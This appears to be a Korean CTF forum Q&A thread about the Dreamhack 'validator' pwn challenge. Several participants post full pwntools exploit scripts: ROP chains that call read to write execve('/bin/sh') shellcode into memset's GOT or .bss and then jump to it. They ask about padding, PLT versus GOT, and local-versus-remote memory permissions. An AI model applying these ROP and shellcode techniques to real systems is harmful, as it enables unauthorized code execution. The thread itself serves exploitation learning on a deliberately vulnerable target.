아래는 제 exploit 코드입니다. 이 코드에서 쉘 코드를 memset got에 overwrite한 후 memset의 got으로 ret를 변조할 때 앞에 p64(0)을 7번 붙여주지 않는다면 exploit이 수행되지 않는데, 이유를 모르겠습니다.. 왜 memset got으로만 ret를 변조했을 때는 쉘을 얻지 못하지만 앞에 p64(0)을 7번 붙여준다면 쉘을 얻을 수 있는건가요? from pwn import * context.log_level = 'debug' csu_pop = 0x00000000004006EA #pop rbx pop rbp pop r12 pop r13 pop r14 pop r15 ret csu_mov = 0x00000000004006D0 #r15 -> rdx r14 -> rsi r13 -> rdi call r12+rbx*8 shellcode = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" #31byte payload = b"DREAMHACK!" arr = [] for i in range(118,0,-1): arr.append(i) payload += bytearray(arr) payload += p64(0) print(len(payload)) p = remote('host1.dreamhack.games', 8893) #p = process('./validator_dist') e = ELF('./validator_dist') bss = e.bss() def make_csu_chain(address, arg1, arg2, arg3): temp = p64(csu_pop) + p64(0) + p64(1) + address + arg1 + arg2 + arg3 + p64(csu_mov) return temp payload += make_csu_chain(p64(e.got['read']), p64(0), p64(e.got['memset']), p64(len(shellcode)+1)) payload += p64(e.got['memset']) #위 코드 대신 이 코드를 사용하면 exploit이 됨 payload += p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(e.got['memset']) p.sendline(payload) sleep(0.5) p.sendline(shellcode) p.interactive() 화면 캡처 2021-06-01 122755.png 위는 csu 코드 및 주소 입니다.

보호기법이 걸려있어서 그런건가요?? 어떤 기법이 적용되어 있는건가요??

local에서 진행했습니다. memset.got 주소에 shellcode를 overwrite하는 데에는 성공했습니다. 그런데 memset.got에 진입한 이후는 gdb에서 ni를 하려고 하면 계속 SIGSEGV가 뜨면서 진행이 되지 않습니다 혹시 원인이 무엇인지 아신다면 알려주세요ㅠㅠ 1.jpg 2.jpg 3.jpg

캡처.PNG 제 GDB에는 실행 권한이 없는데, 원래 이런건가요?

payload = b'DREAMHACK!' for i in range(118, 0, -1): payload += i.to_bytes(1, byteorder='little') payload += p64(0) 페이로드의 일부인데 맨 아래 코드(8바이트의 \x00을 넣어주는 코드)는 잘 되는데 똑같이 8 바이트의 A 를 넣어주는 payload += b'A' * 8 로 바꾸면 익스가 되지 않는데 그 이유를 모르겠습니다. 그리고 main 함수 내에서 leave 명령을 수행했을 때 저기에 있는 8바이트가 rbp에 들어가는 것이 맞나요?

원래 bss가 rwx영역이었나요??

from pwn import * context.arch = 'amd64' p = remote('host1.dreamhack.games', 17182) e = ELF('./validator_server') payroad = b'DREAMHACK!' for i in range(118 + 8, 0, -1): payroad += (i).to_bytes(1, byteorder='little') shell_code = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" read_plt = e.plt['read'] read_got = e.got['read'] pop_rdi = 0x00000000004006f3 pop_rsi_r15 = 0x00000000004006f1 pop_rdx = 0x000000000040057b payroad += p64(pop_rdi) + p64(0) payroad += p64(pop_rsi_r15) + p64(read_got) + p64(0) payroad += p64(pop_rdx) + p64(len(shell_code)) payroad += p64(read_plt) payroad += p64(read_got) # read_plt를 넣어도 똑같은 거 아닌가요?? p.send(payroad) p.send(shell_code) p.interactive() 위의 코드로 익스플로잇을 실행했을 때 마지막 payroad에 read_plt를 넣었을 때는 쉘을 획득하지 못하고 read_got를 넣었을 때만 쉘코드가 실행되는 이유가 궁금합니다. read_plt를 넣어줘도 read_got의 주소를 가리키게 돼서 결국 read_got의 쉘코드가 실행되어야 하지 않나요?

앞서 질문을 드렸는데, 답변이 없어 새로 올립니다. bss영역에 shellcode를 넣고 마지막에 bss주소로 띄게 하여 shellcode를 획득했습니다. 그런데 서버에 시도했을 때에는 바로 성공하는데, local에서는 계속 SIGSEGV가 납니다. 이것때문에 계속 안 되는줄 알고 삽질했는데, 혹이 이게 왜 그런것일지요? [*] Process './validator_dist' stopped with exit code -11 (SIGSEGV) (pid 23803) Lv.10 anous 7일 전 (수정됨) 스택 검사하는 부분은 건너띄고, 아래 payload를 보냈습니다. shellcode = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" bss = 0x000000000060104b payload += p64(pop_rdi) payload += p64(0) # rdi payload += p64(pop_rsi_r15) payload += p64(bss) + p64(0) # rsi, r15 payload += p64(pop_rdx) payload += p64(len(shellcode)) payload += p64(read_plt) payload += p64(bss) p.send(payload) pause() p.send(shellcode) p.interactive() `

안녕하세요. local에서는 memset의 got entry와 bss 모두 실행 권한이 없다고 나오고, 둘 다 shellcode로 overwrite하려니 Seg fault가 발생하는데, remote에서는 memset의 got나 bss 모두 shellcode로 overwrite하니 shell을 잘 획득할 수 있네요. 혹시나 해서 local에서의 vmmap 결과를 첨부합니다. image.png Local과 remote에서 이렇게 rwx 권한이 다르게 설정되어 있는 경우가 어떻게 있을 수 있는지 (같은 executable인데..), 그리고 이렇게 다른 경우 remote의 rwx 권한을 어떻게 파악하면 되는지 궁금합니다.. 또 문제에서 validator_server 파일은 왜 주어진건가요? dist 파일과 동일해 보이던데 무슨 차이가 있는지 궁금합니다.

bss영역에 shellcode를 넣고 마지막에 bss주소로 띄게 하여 shellcode를 획득했습니다. 그런데 서버에 시도했을 때에는 바로 성공하는데, local에서는 계속 SIGSEGV가 납니다. 이것때문에 계속 안 되는줄 알고 삽질했는데, 혹이 이게 왜 그런것일지요? [*] Process './validator_dist' stopped with exit code -11 (SIGSEGV) (pid 23803)